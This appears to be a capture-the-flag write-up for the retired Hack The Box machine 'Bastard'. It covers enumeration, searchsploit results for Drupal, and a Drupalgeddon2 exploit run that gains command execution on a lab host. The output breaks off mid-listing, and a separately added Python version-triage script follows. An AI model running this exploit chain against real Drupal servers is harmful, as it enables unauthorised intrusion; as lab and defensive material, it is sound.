Bastard

# ENUMERATION

NMAP:
- 80: Microsoft IIS httpd 7.5
- 135: Microsoft Windows RPC
- 49154: Microsoft Windows RPC
- Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

============================================

# ENUMERATION
# DRUPAL 7 INSTALLATION ON PORT 80

# FINDING
- Sorry, unrecognized username or password. Have you forgotten your password?
- After a login attempt with default creds; this verifies the account doesn't exist.

============================================

# ENUMERATION
# SEARCHSPLOIT

kali@kali:~/HTB/RETIRED/Bastard$ searchsploit drupal 7
------------------------------------------------------------------------------------------------------------------
 Exploit Title                                                                  | Path
------------------------------------------------------------------------------------------------------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)               | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)     | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)     | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)        | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                          | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                              | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                         | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                           | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                   | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                               | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)        | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)     | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execu | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Met | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command  | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                  | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                              | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure               | php/webapps/44501.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Sc | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                 | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                   | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting         | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload  | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flots | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)               | php/remote/40130.rb
------------------------------------------------------------------------------------------------------------------

- Not interested in the ones before version 7

============================================

# ENUMERATION
# DIRB
- nothing of note...
- EDIT: found directory called /rest
  + http://10.10.10.9/rest (CODE:200|SIZE:62)
- this will be used later...
============================================

# EXPLOIT
# CVE 2014-3704
- Ran script from https://www.exploit-db.com/exploits/34992
- [X] NOT Vulnerable :(

============================================

# EXPLOIT
# CVE 2018-7600
- https://github.com/dreadlocked/Drupalgeddon2/blob/master/README.md

kali@kali:~/HTB/RETIRED/Bastard/Drupalgeddon2$ ./drupalgeddon2.rb http://10.10.10.9/drupal-7/
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/drupal-7/
--------------------------------------------------------------------------------
[redacted]
[-] Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE

============================================

# EXPLOIT
# CVE 2018-7600
- https://github.com/dreadlocked/Drupalgeddon2/blob/master/README.md
- This is the same exploit as above, just run the command against the web root instead of the /drupal-7/ directory

kali@kali:~/HTB/RETIRED/Bastard/Drupalgeddon2$ ./drupalgeddon2.rb http://10.10.10.9/
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
--------------------------------------------------------------------------------
[redacted]
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo XUGDXOLL
[+] Result : XUGDXOLL
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[redacted]
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\inetpub\drupal-7.54

19/03/2017  09:04
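The two outcomes above follow from the version ranges in the searchsploit titles: 34992 covers Drupal 7.0 < 7.31, Drupalgeddon2 covers < 7.58, and the directory name at the end (drupal-7.54) suggests the box runs 7.54. The script below is an added patch-triage example, not part of this writeup or of any tool it uses; it parses those range clauses per release branch and reports which listed entries still apply to an installed version (the 7.54 input and the CVE labels are assumptions taken from this page).

```python
import re

# Exploit-DB entries as titled in the searchsploit output above; the version
# ranges are copied from those titles. CVE numbers are the ones this writeup names.
ADVISORIES = {
    "34992.py  Drupalgeddon  (CVE-2014-3704)": "Drupal 7.0 < 7.31",
    "44449.rb  Drupalgeddon2 (CVE-2018-7600)": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1",
    "44542.txt Drupalgeddon3 (authenticated)": "Drupal < 7.58",
}

def parse_version(text):
    """'7.54' -> (7, 54); a suffix such as '-dev' is ignored."""
    return tuple(int(n) for n in re.findall(r"\d+", text))

def parse_clauses(title):
    """'Drupal 7.0 < 7.31 / < 8.3.9' -> [((7, 0), (7, 31)), (None, (8, 3, 9))]."""
    clauses = []
    for part in title.replace("Drupal", "").split("/"):
        m = re.fullmatch(r"\s*(?:([\d.]+)\s*)?<\s*([\d.]+)\s*", part)
        if not m:
            raise ValueError("unparsed range clause: %r" % part)
        lower = parse_version(m.group(1)) if m.group(1) else None
        clauses.append((lower, parse_version(m.group(2))))
    return clauses

def is_affected(version, title):
    """True or False for the release branch a clause covers, None if no clause
    covers this branch (e.g. 8.2.x against the Drupalgeddon2 title)."""
    v = parse_version(version)
    for lower, upper in parse_clauses(title):
        branch = upper[:-1]             # '7.31' -> (7,), '8.4.6' -> (8, 4)
        if v[:len(branch)] != branch:
            continue                    # clause is for another branch
        return (lower is None or v >= lower) and v < upper
    return None

def triage(version):
    """Verdict per listed advisory for one installed version."""
    labels = {True: "affected", False: "fixed", None: "branch not listed"}
    return {name: labels[is_affected(version, rng)] for name, rng in ADVISORIES.items()}

if __name__ == "__main__":
    # Constructed input: 7.54, as the C:\inetpub\drupal-7.54 directory name suggests.
    for name, verdict in triage("7.54").items():
        print("%-40s %s" % (name, verdict))
```

For 7.54 the Drupalgeddon (34992) entry comes back "fixed" and both Drupalgeddon2 and Drupalgeddon3 come back "affected", which matches the failed and successful attempts above.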